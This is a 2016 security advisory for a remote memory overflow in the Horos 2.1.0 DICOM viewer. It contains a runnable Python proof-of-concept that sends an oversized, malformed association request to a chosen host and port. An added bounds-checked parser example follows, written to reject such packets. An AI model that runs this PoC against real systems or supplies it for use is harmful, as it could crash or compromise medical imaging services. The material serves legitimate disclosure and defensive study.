Horos 2.1.0 DICOM Medical Image Viewer Remote Memory Overflow
Posted on 16 December 2016
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
#
# Horos 2.1.0 DICOM Medical Image Viewer Remote Memory Overflow Vulnerability
#
#
# Vendor: Horos Project
# Product web page: https://www.horosproject.org
# Affected version: 2.1.0
#
# Summary: Horos is an open-source, free medical image viewer. The goal of the Horos Project is
# to develop a fully functional, 64-bit medical image viewer for OS X. Horos is based upon OsiriX
# and other open source medical imaging libraries.
#
# Desc: The vulnerability is caused by the use of a vulnerable collection of libraries that
# are part of the DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol (DUL).
# A stack/heap buffer overflow/underflow can be triggered when the DICOM Store-SCP service receives
# and processes an ACSE data structure whose declared length is wrong. An attacker can overflow
# the stack and the heap of the process by sending a large array of bytes in the presentation
# context item length segment of the DICOM standard, potentially resulting in remote code execution
# and/or a denial of service scenario.
#
# Tested on: OS X 10.12.2 (Sierra)
#            OS X 10.12.1 (Sierra)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2016-5386
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5386.php
#
#
# 15.12.2016
#

import sys, socket

# A-ASSOCIATE-RQ PDU: type 0x01, reserved, PDU length (0x00008071), protocol version 0x0001,
# reserved, called AE title "ORTHANC" (16 bytes), calling AE title "JOXYPOXY!" (16 bytes),
# 32 reserved bytes, application context item (0x10, length 0x15, "1.2.840.10008.3.1.1.1"),
# then the start of a presentation context item (0x20) with a declared length of 0x8000.
hello = ('\x01\x00\x00\x00\x80\x71\x00\x01\x00\x00\x4f\x52\x54\x48'
         '\x41\x4e\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4a\x4f'
         '\x58\x59\x50\x4f\x58\x59\x21\x00\x00\x00\x00\x00\x00\x00'
         '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
         '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
         '\x00\x00\x00\x00\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34'
         '\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e'
         '\x31\x20\x00\x80\x00')

# Presentation context item body: 40000 bytes of filler, more than the declared item length
# and more than the declared PDU length.
buffer = '\x41\x42\x43\x44' * 10000

# User information item (0x50, length 0x0c) holding a maximum-length sub-item (0x51, 0x07de)
# and an empty implementation class UID sub-item (0x52).
bye = ('\x50\x00\x00\x0c\x51\x00\x00\x04\x00\x00\x07\xde'
       '\x52\x00\x00\x00')

if len(sys.argv) < 3:
    print '  Usage: ' + sys.argv[0] + ' <target> <port>'
    print 'Example: ' + sys.argv[0] + ' 172.19.0.214 11112'
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(251)
s.send(hello + buffer + bye)
s.close()
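The defect class described above is a length field that disagrees with its container. The following is an added example, not part of the advisory and not DCMTK's or Horos's code: a length-checking parser for the A-ASSOCIATE-RQ PDU that a Store-SCP receives. It enforces the two consistency checks a DUL parser needs before copying anything into a fixed-size structure: the declared PDU length must match the bytes actually held, and every item (and every sub-item inside a presentation context) must end inside its container. Field offsets follow DICOM PS3.8 section 9.3.2; `MAX_PDU_LENGTH` is a hypothetical receiver policy, the AE titles and the sample PDUs are constructed here, and the two malformed samples mirror the shape of the PoC (a forged PDU length, and a presentation context item length larger than what follows it). A streaming receiver normally reads the 6-byte header and then exactly `pdu_len` bytes, so in practice the item-versus-container check is the one that matters.

```python
#!/usr/bin/env python3
# Added example: bounds-checked A-ASSOCIATE-RQ parsing (not the advisory's or DCMTK's code).
import struct

PDU_A_ASSOCIATE_RQ = 0x01
ITEM_APP_CONTEXT = 0x10
ITEM_PRES_CONTEXT_RQ = 0x20
ITEM_USER_INFO = 0x50

FIXED_HEADER = 6          # type(1) reserved(1) length(4)
FIXED_BODY = 68           # version(2) reserved(2) called AE(16) calling AE(16) reserved(32)
MAX_PDU_LENGTH = 0x10000  # hypothetical receiver limit on a single association request


class PduError(ValueError):
    """Raised when a PDU fails a structural or length check."""


def parse_items(data, start, end):
    """Walk type/reserved/length/value items in data[start:end]; return [(type, value), ...]."""
    items, pos = [], start
    while pos < end:
        if end - pos < 4:
            raise PduError("truncated item header at offset %d" % pos)
        item_type, _reserved, item_len = struct.unpack(">BBH", data[pos:pos + 4])
        value_start, value_end = pos + 4, pos + 4 + item_len
        if value_end > end:
            # The inconsistency the advisory describes: an item claims more bytes than its container holds.
            raise PduError("item 0x%02x length %d overruns container end (%d > %d)"
                           % (item_type, item_len, value_end, end))
        items.append((item_type, data[value_start:value_end]))
        pos = value_end
    return items


def parse_associate_rq(data):
    """Validate an A-ASSOCIATE-RQ PDU and return its parts; raise PduError on any inconsistency."""
    if len(data) < FIXED_HEADER + FIXED_BODY:
        raise PduError("PDU shorter than the fixed A-ASSOCIATE-RQ header")
    pdu_type, _reserved, pdu_len = struct.unpack(">BBI", data[:FIXED_HEADER])
    if pdu_type != PDU_A_ASSOCIATE_RQ:
        raise PduError("unexpected PDU type 0x%02x" % pdu_type)
    if pdu_len > MAX_PDU_LENGTH:
        raise PduError("declared PDU length %d exceeds receiver limit" % pdu_len)
    if pdu_len != len(data) - FIXED_HEADER:
        raise PduError("declared PDU length %d != received %d" % (pdu_len, len(data) - FIXED_HEADER))
    body_end = FIXED_HEADER + pdu_len
    version = struct.unpack(">H", data[6:8])[0]
    called_ae = data[10:26].decode("ascii", "replace").rstrip()
    calling_ae = data[26:42].decode("ascii", "replace").rstrip()
    items = parse_items(data, FIXED_HEADER + FIXED_BODY, body_end)
    pres_contexts = []
    for item_type, value in items:
        if item_type == ITEM_PRES_CONTEXT_RQ:
            if len(value) < 4:
                raise PduError("presentation context item too short")
            ctx_id = value[0]                      # value: ctx-id(1) reserved(3) sub-items...
            if ctx_id % 2 == 0:
                raise PduError("presentation context ID %d must be odd" % ctx_id)
            pres_contexts.append((ctx_id, parse_items(value, 4, len(value))))
    return {"version": version, "called_ae": called_ae, "calling_ae": calling_ae,
            "items": [t for t, _ in items], "presentation_contexts": pres_contexts}


def item(item_type, value):
    """Encode one DUL item: type, reserved byte, big-endian 16-bit length, value."""
    return struct.pack(">BBH", item_type, 0, len(value)) + value


def build_associate_rq(called_ae, calling_ae, items, declared_len=None):
    """Build an A-ASSOCIATE-RQ; declared_len lets a test forge an inconsistent PDU length."""
    body = (struct.pack(">HH", 1, 0) + called_ae.ljust(16).encode() +
            calling_ae.ljust(16).encode() + b"\0" * 32 + b"".join(items))
    length = len(body) if declared_len is None else declared_len
    return struct.pack(">BBI", PDU_A_ASSOCIATE_RQ, 0, length) + body


# Constructed samples (AE titles and UIDs chosen here; Verification SOP class, implicit VR LE).
APP_CTX = item(ITEM_APP_CONTEXT, b"1.2.840.10008.3.1.1.1")
VERIFICATION_CTX = item(ITEM_PRES_CONTEXT_RQ, bytes([1, 0, 0, 0]) +
                        item(0x30, b"1.2.840.10008.1.1") + item(0x40, b"1.2.840.10008.1.2"))
USER_INFO = item(ITEM_USER_INFO, item(0x51, struct.pack(">I", 16384)))
GOOD_PDU = build_associate_rq("ORTHANC", "TESTSCU", [APP_CTX, VERIFICATION_CTX, USER_INFO])
# Forged PDU length (0x8071) in front of a far larger body, as in the PoC's hello+buffer+bye.
BAD_LENGTH_PDU = build_associate_rq("ORTHANC", "TESTSCU", [
    APP_CTX, struct.pack(">BBH", ITEM_PRES_CONTEXT_RQ, 0, 0x8000) + b"ABCD" * 10000, USER_INFO],
    declared_len=0x8071)
# Consistent PDU length, but a presentation context item that claims 0x8000 bytes it does not carry.
BAD_ITEM_PDU = build_associate_rq("ORTHANC", "TESTSCU", [
    APP_CTX, struct.pack(">BBH", ITEM_PRES_CONTEXT_RQ, 0, 0x8000) + b"ABCD" * 10, USER_INFO])


def classify(pdu):
    """Return 'accept' or 'reject:<reason>', the decision a length-checking Store-SCP would make."""
    try:
        parse_associate_rq(pdu)
        return "accept"
    except PduError as exc:
        return "reject:" + str(exc)


if __name__ == "__main__":
    for name, pdu in (("good", GOOD_PDU), ("forged length", BAD_LENGTH_PDU), ("item overrun", BAD_ITEM_PDU)):
        print("%-14s %s" % (name, classify(pdu)))
```

The point of `parse_items` is that it is driven by the container's end, never by the item's own length alone, so an oversized item length is an error rather than a copy size. The same walk is reused for the sub-items of each presentation context, which is where the PoC's filler would otherwise be interpreted as abstract and transfer syntax sub-items with lengths taken from the attacker's bytes.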